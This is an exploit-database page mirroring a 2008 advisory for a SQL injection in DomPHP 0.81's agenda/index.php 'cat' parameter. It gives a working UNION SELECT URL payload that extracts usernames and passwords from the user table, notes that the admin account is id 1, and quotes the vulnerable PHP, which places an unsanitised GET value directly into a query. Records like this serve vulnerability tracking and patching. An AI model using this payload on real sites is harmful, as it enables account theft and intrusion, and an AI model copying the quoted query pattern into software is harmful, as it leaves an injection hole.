Lucene search
K

DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability

🗓️ 11 Jan 2008 00:00:00Reported by MhZ91Type 
zdt
 zdt
🔗 0day.today👁 40 Views

DomPHP v0.81 Remote Sql Injection in index.ph

Code
==============================================================
DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability
==============================================================



--==+================================================================================+==--
--==+		         DomPHP v0.81 Remote Sql Injection                           +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: DomPHP v0.81 Remote Sql Injection
 Download: http://www.domphp.com
 Bug: Remote Sql Injection
 Info: DomPHP est un outil de publication entierement modulable et surtout completement personnalisable ! Ideal pour les experts mais aussi pour les novices desireux de presenter un site de qualite, vous allez creer votre portail ou site web en quelques clics !


[*]----------------------------------------------------------

Exploit:

http://[www.example.com]/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*

For get the user and password, u must edit [UserId] whit an id number of members. 
The id of admin, is 1 of default. 

Vuln code in /agenda/index.php

[...]

if ($_GET['cat']) {
	$cat = $_GET['cat'];

	if (!$nomcat) {
	$requete5="select nomCategorie from ".$extension."sortircat where id_categorie=$cat";
	$result5=mysql_query($requete5, $link);
	$recherchenomcat=mysql_fetch_object($result5);
        $nomcat = stripslashes($recherchenomcat->nomCategorie);
	}
[...]

There is other more sql injection... 

[*]----------------------------------------------------------



#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jan 2008 00:00Current
7.1High risk
Vulners AI Score7.1
40